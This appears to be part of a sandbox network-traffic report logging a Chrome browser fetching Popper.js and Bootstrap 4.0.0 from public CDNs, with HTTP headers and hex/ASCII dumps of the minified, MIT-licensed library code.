                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 67 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45
                                                                                                                                                                Data Ascii: g=function(t){return t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTE
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73
                                                                                                                                                                Data Ascii: lement=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this
                                                                                                                                                                2024-11-23 19:36:01 UTC1369INData Raw: 29 74 2e 74 6f 28 69 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69
                                                                                                                                                                Data Ascii: )t.to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];i


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                13192.168.2.449760104.17.25.144434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:02 UTC388OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                                                                                                Host: cdnjs.cloudflare.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: */*
                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:36:03 UTC961INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:03 GMT
                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Cache-Control: public, max-age=30672000
                                                                                                                                                                ETag: W/"5eb03fa9-4af4"
                                                                                                                                                                Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                                                                                cf-cdnjs-via: cfworker/kv
                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                Age: 1372271
                                                                                                                                                                Expires: Thu, 13 Nov 2025 19:36:03 GMT
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I4WlAEVmcFuPWuS5L0mE83Fh%2BsX6FTCqkrdjHsxbAhbuFVhDMD%2BTwWKMXPtRqqpCPsZdubr1eDkVnwmcFFROD1yi1%2F8bkqVojhnNQlXYYJW6t4%2FCozoHM1xY2cUYI1g8x4KhqADq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Strict-Transport-Security: max-age=15780000
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8e739b1bdf4a1a2c-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2024-11-23 19:36:03 UTC408INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                                                                                Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                                                                                2024-11-23 19:36:03 UTC1369INData Raw: 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e
                                                                                                                                                                Data Ascii: ==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#documen
                                                                                                                                                                2024-11-23 19:36:03 UTC1369INData Raw: 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72
                                                                                                                                                                Data Ascii: ){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['bor
                                                                                                                                                                2024-11-23 19:36:03 UTC1369INData Raw: 6f 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75
                                                                                                                                                                Data Ascii: op:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}retu
                                                                                                                                                                2024-11-23 19:36:03 UTC1369INData Raw: 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77
                                                                                                                                                                Data Ascii: ight:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.w
                                                                                                                                                                2024-11-23 19:36:03 UTC1369INData Raw: 6c 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74
                                                                                                                                                                Data Ascii: le.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={inst
                                                                                                                                                                2024-11-23 19:36:03 UTC1369INData Raw: 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73
                                                                                                                                                                Data Ascii: his.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{pas
                                                                                                                                                                2024-11-23 19:36:03 UTC1369INData Raw: 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65
                                                                                                                                                                Data Ascii: turn o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){re
                                                                                                                                                                2024-11-23 19:36:03 UTC1369INData Raw: 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f
                                                                                                                                                                Data Ascii: turn''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}functio
                                                                                                                                                                2024-11-23 19:36:03 UTC1369INData Raw: 74 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                                                                Data Ascii: turn o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                14192.168.2.449761104.18.11.2074434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:03 UTC382OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                                                                                                                Host: maxcdn.bootstrapcdn.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: */*
                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                2024-11-23 19:36:03 UTC967INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:03 GMT
                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                CDN-PullZone: 252412
                                                                                                                                                                CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                                                CDN-RequestCountryCode: US
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Cache-Control: public, max-age=31919000
                                                                                                                                                                ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                                                                                                                                Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                                                                                                CDN-ProxyVer: 1.04
                                                                                                                                                                CDN-RequestPullSuccess: True
                                                                                                                                                                CDN-RequestPullCode: 200
                                                                                                                                                                CDN-CachedAt: 09/24/2024 09:00:40
                                                                                                                                                                CDN-EdgeStorageId: 1067
                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                CDN-Status: 200
                                                                                                                                                                CDN-RequestTime: 0
                                                                                                                                                                CDN-RequestId: ca49da3fb29e07efbacf1b18db3e7dc9
                                                                                                                                                                CDN-Cache: HIT
                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                Age: 1328291
                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8e739b1d0fc84414-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2024-11-23 19:36:03 UTC402INData Raw: 37 62 65 63 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                                                                                                                Data Ascii: 7bec/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                                                                                                                                2024-11-23 19:36:03 UTC1369INData Raw: 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69
                                                                                                                                                                Data Ascii: fine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defi
